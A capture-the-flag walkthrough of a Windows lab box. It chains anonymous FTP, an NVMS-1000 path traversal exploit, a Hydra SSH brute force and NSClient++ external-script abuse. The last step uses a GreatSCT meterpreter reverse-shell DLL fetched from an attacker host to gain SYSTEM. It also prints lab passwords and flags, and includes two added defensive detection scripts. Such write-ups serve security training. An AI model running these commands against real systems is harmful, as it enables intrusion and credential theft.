Initial Scan with Nmap
We begin by running an nmap scan against the target machine to identify open ports and services:
nmap -sC -sV -Pn -v 10.129.232.55
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_02-28-22 07:35PM <DIR> Users
22/tcp open ssh OpenSSH for_Windows_8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 c7:1a:f6:81:ca:17:78:d0:27:db:cd:46:2a:09:2b:54 (RSA)
| 256 3e:63:ef:3b:6e:3e:4a:90:f3:4c:02:e9:40:67:2e:42 (ECDSA)
|_ 256 5a:48:c8:cd:39:78:21:29:ef:fb:ae:82:1d:03:ad:af (ED25519)
80/tcp open http
|_http-favicon: Unknown favicon MD5: 3AEF8B29C4866F96A539730FAB53A88F
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html).
| fingerprint-strings:
| GetRequest, HTTPOptions, RTSPRequest:
| HTTP/1.1 200 OK
| Content-type: text/html
| Content-Length: 340
| Connection: close
| AuthInfo:
| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
| <html xmlns="http://www.w3.org/1999/xhtml">
| <head>
| <title></title>
| <script type="text/javascript">
| window.location.href = "Pages/login.htm";
| </script>
| </head>
| <body>
| </body>
| </html>
| NULL:
| HTTP/1.1 408 Request Timeout
| Content-type: text/html
| Content-Length: 0
| Connection: close
|_ AuthInfo:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5666/tcp open tcpwrapped
6699/tcp open napster?
8443/tcp open ssl/https-alt
| http-methods:
|_ Supported Methods: GET
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2020-01-14T13:24:20
| Not valid after: 2021-01-13T13:24:20
| MD5: 1d03:0c40:5b7a:0f6d:d8c8:78e3:cba7:38b4
|_SHA-1: 7083:bd82:b4b0:f9c0:cc9c:5019:2f9f:9291:4694:8334
| http-title: NSClient++
|_Requested resource was /index.html
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
| HTTP/1.1 404
| Content-Length: 18
| Document not found
| GetRequest:
| HTTP/1.1 302
| Content-Length: 0
| Location: /index.html
| @+hb
| workers
|_ jobs
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-10-28T03:04:28
|_ start_date: N/A
|_clock-skew: -5s
This reveals several open ports, including:
- Port 21: FTP (Microsoft FTP service)
  - Anonymous login enabled
- Port 22: SSH (OpenSSH for Windows 8.0)
- Port 80: HTTP
- Port 8443: SSL (NSClient++)
From the scan results, we learn that anonymous FTP access is allowed, and there is an HTTP server with a redirect to a login page.
What service runs on port 21? FTP
Is anonymous authentication enabled on the FTP service? Yes
Connecting to FTP
Using the anonymous credentials, we connect to the FTP service:
ftp 10.129.232.55
Name: anonymous
Password: (press Enter)
We navigate to the Nadine directory and download Confidential.txt, which contains a message indicating the presence of Passwords.txt on Nathan's desktop.
└─$ ftp 10.129.232.55
Connected to 10.129.232.55
220 Microsoft FTP Service
Name (10.129.232.55:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49684|)
125 Data connection already open; Transfer starting.
02-28-22 07:35PM <DIR> Users
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49685|)
125 Data connection already open; Transfer starting.
02-28-22 07:36PM <DIR> Nadine
02-28-22 07:37PM <DIR> Nathan
226 Transfer complete.
ftp> cd Nadine
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49686|)
150 Opening ASCII mode data connection.
02-28-22 07:36PM 168 Confidential.txt
226 Transfer complete.
ftp> get Confidential.txt
local: Confidential.txt remote: Confidential.txt
229 Entering Extended Passive Mode (|||49687|)
125 Data connection already open; Transfer starting.
100% |***********************************************************************| 168 1.33 KiB/s 00:00 ETA
226 Transfer complete.
WARNING! 6 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
168 bytes received in 00:00 (1.32 KiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||50838|)
125 Data connection already open; Transfer starting.
02-28-22 07:36PM 182 Notes to do.txt
226 Transfer complete.
ftp> get Notes to do.txt
Upon opening Confidential.txt, we discover:
└─$ cat Confidential.txt
Nathan,
I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.
Regards
Nadine
Upon opening Notes to do.txt, we discover:
└─$ cat Notes\ to\ do.txt
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint
What is the full name of the sensitive file present on Nathan's Desktop? Passwords.txt
Exploring the HTTP Service
Navigating to http://10.129.227.77, we find a webpage for NVMS-1000, a network video surveillance application. After some research, we find that CVE-2019-20085 affects this software, allowing arbitrary file read.
We download the exploit from https://github.com/AleDiBen/NVMS1000-Exploit/blob/master/nvms.py.
Using the exploit, we retrieve Passwords.txt from Nathan's desktop, which provides several potential passwords.
└─$ python nvms.py 10.129.227.77 Users/Nathan/Desktop/Passwords.txt Passwords.txt
[+] DT Attack Succeeded
[+] Saving File Content
[+] Saved
[+] File Content
++++++++++ BEGIN ++++++++++
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
++++++++++ END ++++++++++
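Added example, not part of the original writeup or the NVMS1000-Exploit repository: a defender-side detector that replays constructed access-log lines (the Common Log Format and the request paths are assumptions, not real NVMS-1000 logs) and flags requests whose normalized path climbs above the web root, which is the directory-traversal ("DT") primitive the exploit output above reports as succeeding. It percent-decodes repeatedly and treats backslashes as separators so that encoded variants are caught as well as the plain one.

```python
import re
from urllib.parse import unquote

# Constructed sample lines (assumption: Common Log Format). One normal page load,
# two traversal attempts (plain, then percent-encoded with backslashes), one unrelated hit.
SAMPLE_LOG = """\
10.10.14.11 - - [27/Oct/2024:23:40:01 -0400] "GET /Pages/login.htm HTTP/1.1" 200 1342
10.10.14.11 - - [27/Oct/2024:23:40:09 -0400] "GET /../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1" 200 168
10.10.14.11 - - [27/Oct/2024:23:40:15 -0400] "GET /%2e%2e%5c%2e%2e%5cUsers%5cNathan%5cDesktop%5cPasswords.txt HTTP/1.1" 200 168
10.10.14.12 - - [27/Oct/2024:23:41:02 -0400] "GET /images/logo.png HTTP/1.1" 200 4210
"""

LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)')

def normalize_path(raw):
    """Drop the query, percent-decode until stable (double encoding), unify separators."""
    path = raw.split("?", 1)[0]
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")

def escapes_webroot(path):
    """Walk the segments; True as soon as a '..' pops above the web root."""
    depth = 0
    for seg in path.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False

def find_traversal(log_text):
    """One dict per escaping request; served=True (HTTP 200) means the file was handed over."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        norm = normalize_path(m["path"])
        if escapes_webroot(norm):
            hits.append({"src": m["src"], "path": norm,
                         "served": m["status"] == "200"})
    return hits

if __name__ == "__main__":
    for hit in find_traversal(SAMPLE_LOG):
        print(f"{hit['src']} -> {hit['path']} served={hit['served']}")
```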
Brute Force SSH Login
Using Hydra, we brute-force SSH logins for the users in users.txt (including Nadine) with the passwords obtained from Passwords.txt:
└─$ hydra -L users.txt -P passwords.txt 10.129.227.77 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-10-27 23:43:33
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 14 tasks per 1 server, overall 14 tasks, 14 login tries (l:2/p:7), ~1 try per task
[DATA] attacking ssh://10.129.227.77:22/
[22][ssh] host: 10.129.227.77 login: Nadine password: L1k3B1gBut7s@W0rk
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-10-27 23:43:37
The valid credentials are found to be:
- Username: Nadine
- Password: L1k3B1gBut7s@W0rk
What is the valid password to authenticate over SSH on TCP port 22? L1k3B1gBut7s@W0rk
SSH Access and User Flag
We SSH into the machine using Nadine's credentials:
ssh Nadine@10.129.232.55
After logging in, we navigate to Nadine's desktop and retrieve the user.txt flag.
nadine@SERVMON C:\Users\Nadine>dir
Volume in drive C has no label.
Volume Serial Number is 20C1-47A1
Directory of C:\Users\Nadine
02/28/2022 08:04 PM <DIR> .
02/28/2022 08:04 PM <DIR> ..
02/28/2022 08:04 PM <DIR> 3D Objects
02/28/2022 08:04 PM <DIR> Contacts
02/28/2022 08:05 PM <DIR> Desktop
02/28/2022 08:04 PM <DIR> Documents
02/28/2022 08:04 PM <DIR> Downloads
02/28/2022 08:04 PM <DIR> Favorites
02/28/2022 08:04 PM <DIR> Links
02/28/2022 08:04 PM <DIR> Music
02/28/2022 08:04 PM <DIR> Pictures
02/28/2022 08:04 PM <DIR> Saved Games
02/28/2022 08:04 PM <DIR> Searches
02/28/2022 08:04 PM <DIR> Videos
0 File(s) 0 bytes
14 Dir(s) 6,128,906,240 bytes free
nadine@SERVMON C:\Users\Nadine>cd Desktop
nadine@SERVMON C:\Users\Nadine\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 20C1-47A1
Directory of C:\Users\Nadine\Desktop
02/28/2022 08:05 PM <DIR> .
02/28/2022 08:05 PM <DIR> ..
10/27/2024 07:59 PM 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 6,128,906,240 bytes free
nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt
d291702c4a1ab9dc8630b211a128be17
Investigating Installed Software
Checking the installed applications, we notice NSClient++ is installed.
nadine@SERVMON C:\>cd "Program Files"
nadine@SERVMON C:\Program Files>dir
Volume in drive C has no label.
Volume Serial Number is 20C1-47A1
Directory of C:\Program Files
02/28/2022 07:55 PM <DIR> .
02/28/2022 07:55 PM <DIR> ..
03/01/2022 02:20 AM <DIR> Common Files
11/11/2019 07:52 PM <DIR> internet explorer
02/28/2022 07:07 PM <DIR> MSBuild
02/28/2022 07:55 PM <DIR> NSClient++
02/28/2022 07:46 PM <DIR> NVMS-1000
02/28/2022 07:32 PM <DIR> OpenSSH-Win64
02/28/2022 07:07 PM <DIR> Reference Assemblies
02/28/2022 06:44 PM <DIR> VMware
11/11/2019 07:52 PM <DIR> Windows Defender
11/11/2019 07:52 PM <DIR> Windows Defender Advanced Threat Protection
09/15/2018 12:19 AM <DIR> Windows Mail
11/11/2019 07:52 PM <DIR> Windows Media Player
09/15/2018 12:19 AM <DIR> Windows Multimedia Platform
09/15/2018 12:28 AM <DIR> windows nt
11/11/2019 07:52 PM <DIR> Windows Photo Viewer
09/15/2018 12:19 AM <DIR> Windows Portable Devices
09/15/2018 12:19 AM <DIR> Windows Security
02/28/2022 07:25 PM <DIR> WindowsPowerShell
0 File(s) 0 bytes
20 Dir(s) 6,128,881,664 bytes free
There's an unusual third-party application on the system. What's the name of this software? NSClient++
We inspect the nsclient.ini configuration file and find the following line:
nadine@SERVMON C:\Program Files\NSClient++>type nsclient.ini
# If you want to fill this file with all available options run the following command:
# nscp settings --generate --add-defaults --load-all
# If you want to activate a module and bring in all its options use:
# nscp settings --activate-module <MODULE NAME> --add-defaults
# For details run: nscp settings --help
; in flight - TODO
[/settings/default]
; Undocumented key
password = ew2x6SsGTxjRwXOT
Exploitation
Let's set up an SSH tunnel to reach the NSClient++ web app on localhost port 8443:
ssh -L 8443:127.0.0.1:8443 nadine@10.129.232.55
Navigate to https://localhost:8443 and log in with the password found in the ini file. Let's create an external script that will execute our payload on the system.
Navigate to Settings > External Scripts > Scripts and click + Add new.
Next, input /settings/external scripts/scripts/shellz in the Section field, command in the Key field, and C:\Users\Nadine\Documents\pwn.bat in the Value field. The bat file will be used to run commands as SYSTEM.
Save the script, click Changes, and then Save Configuration. Select Control > Reload.
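The two weaknesses used above (a cleartext web password in nsclient.ini, and an external script definition that points at a user-writable path yet runs under the NSClient++ service account) are both visible in the configuration file, so a defender can audit for them. Added example, not from the original writeup or the NSClient++ project: a small nsclient.ini audit in Python; the embedded ini is a constructed sample modelled on the excerpt above plus the shellz script, and the list of user-writable directories is an assumption about a default Windows layout.

```python
import configparser

# Constructed sample modelled on the nsclient.ini excerpt above, plus the 'shellz'
# external script the walkthrough adds through the web UI and one benign script.
SAMPLE_INI = """\
; in flight - TODO
[/settings/default]
; Undocumented key
password = ew2x6SsGTxjRwXOT

[/settings/external scripts/scripts/shellz]
command = C:\\Users\\Nadine\\Documents\\pwn.bat

[/settings/external scripts/scripts/check_disk]
command = scripts\\check_disk.bat
"""

SCRIPTS_PREFIX = "/settings/external scripts/scripts"
# Directories an unprivileged local user can normally write to (assumption: default
# Windows layout). A script NSClient++ launches from here runs with the service's rights.
USER_WRITABLE = ("c:\\users\\", "c:\\temp\\", "c:\\windows\\temp\\")

def load_ini(text):
    # NSClient++ keys contain spaces and use '#'/';' comments; disable % interpolation.
    cp = configparser.ConfigParser(interpolation=None, allow_no_value=True, strict=False)
    cp.read_string(text)
    return cp

def first_token(command):
    """Program path from a command line, honouring a leading double-quoted path."""
    command = (command or "").strip()
    if command.startswith('"'):
        return command[1:].split('"', 1)[0]
    return command.split()[0] if command else ""

def audit_nsclient(text):
    """Return (check, detail) findings for the configuration in `text`."""
    cp = load_ini(text)
    findings = []
    if cp.get("/settings/default", "password", fallback=""):
        findings.append(("cleartext-password",
                         "/settings/default password is stored in cleartext; "
                         "anyone who can read nsclient.ini can log in to the web UI"))
    for section in cp.sections():
        if not section.startswith(SCRIPTS_PREFIX):
            continue
        # Both layouts: [.../scripts] name = cmd, or [.../scripts/name] command = cmd
        entries = (list(cp.items(section)) if section == SCRIPTS_PREFIX else
                   [(section.rsplit("/", 1)[1], cp.get(section, "command", fallback=""))])
        for name, cmd in entries:
            exe = first_token(cmd)
            if exe.lower().startswith(USER_WRITABLE):
                findings.append(("user-writable-script",
                                 f"external script '{name}' runs {exe} from a user-writable path"))
    return findings
```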
In order to get a shell, let's create a meterpreter payload with GreatSCT. Run setup.sh first.
cd ~/Servmon
git clone https://github.com/GreatSCT/GreatSCT
cd GreatSCT
sudo ./GreatSCT.py --ip 10.10.14.11 --port 1234 -t bypass -p regsvcs/meterpreter/rev_tcp.py -o serv
===============================================================================
Great Scott!
===============================================================================
[Web]: https://github.com/GreatSCT/GreatSCT | [Twitter]: @ConsciousHacker
===============================================================================
[*] Language: regsvcs
[*] Payload Module: regsvcs/meterpreter/rev_tcp
[*] DLL written to: /usr/share/greatsct-output/compiled/serv.dll
[*] Source code written to: /usr/share/greatsct-output/source/serv.cs
[*] Execute with: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe serv.dll
[*] Metasploit RC file written to: /usr/share/greatsct-output/handlers/serv.rc
Start a Python3 HTTP server to serve the DLL:
cd /usr/share/greatsct-output/compiled/
sudo python3 -m http.server 80
Download the DLL from the server using PowerShell.
wget http://10.10.14.11/serv.dll -o C:\Users\Nadine\Documents\serv.dll
Let's echo our payload on the box to create pwn.bat.
Nadine@SERVMON C:\Users\Nadine>cmd /c "echo C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe C:\Users\Nadine\Documents\serv.dll > C:\Users\Nadine\Documents\pwn.bat"
Open msfconsole with the generated RC (resource) file, which sets up the handler:
msfconsole -r /usr/share/greatsct-output/handlers/serv.rc
Next, navigate to the console at https://127.0.0.1:8443, input the script name shellz and click Run. Alternatively, select Control > Reload.
A connection is received. Sometimes the first connection dies; in that case run the command again, and a second, stable connection will be received.
msf6 exploit(multi/handler) >
[*] Sending stage (176198 bytes) to 10.129.232.55
[*] Sending stage (176198 bytes) to 10.129.232.55
[*] Sending stage (176198 bytes) to 10.129.232.55
[*] Meterpreter session 4 opened (10.10.14.11:1234 -> 10.129.232.55:50823) at 2024-10-28 02:03:09 -0400
[*] Meterpreter session 6 opened (10.10.14.11:1234 -> 10.129.232.55:50830) at 2024-10-28 02:03:12 -0400
[*] Sending stage (176198 bytes) to 10.129.232.55
[*] Meterpreter session 7 opened (10.10.14.11:1234 -> 10.129.232.55:50833) at 2024-10-28 02:03:30 -0400
[*] Meterpreter session 5 opened (10.10.14.11:1234 -> 10.129.232.55:50828) at 2024-10-28 02:03:33 -0400
msf6 exploit(multi/handler) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
4 meterpreter x86/windows NT AUTHORITY\SYSTEM @ SERVMON 10.10.14.11:1234 -> 10.129.232.55:50823 (10.129.232.55)
5 meterpreter x86/windows NT AUTHORITY\SYSTEM @ SERVMON 10.10.14.11:1234 -> 10.129.232.55:50828 (10.129.232.55)
6 meterpreter x86/windows NT AUTHORITY\SYSTEM @ SERVMON 10.10.14.11:1234 -> 10.129.232.55:50830 (10.129.232.55)
7 meterpreter x86/windows NT AUTHORITY\SYSTEM @ SERVMON 10.10.14.11:1234 -> 10.129.232.55:50833 (10.129.232.55)
msf6 exploit(multi/handler) > sessions -i 5
[*] Starting interaction with 5...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
The root flag is located in C:\Users\Administrator\Desktop:
meterpreter > ls
Listing: C:\Users\Administrator\Desktop
=======================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 282 fil 2022-03-01 04:18:46 -0500 desktop.ini
100444/r--r--r-- 34 fil 2024-10-28 01:08:08 -0400 root.txt
meterpreter > cat root.txt
c4d110ea97852167eabb5e3d7290bca7
We have found a non-default application, we know the version installed, and we can access it as an authenticated user. Searching for vulnerabilities affecting this environment reveals a Local Privilege Escalation vulnerability. As what user do we get code execution after successfully exploiting this vulnerability? NT AUTHORITY\SYSTEM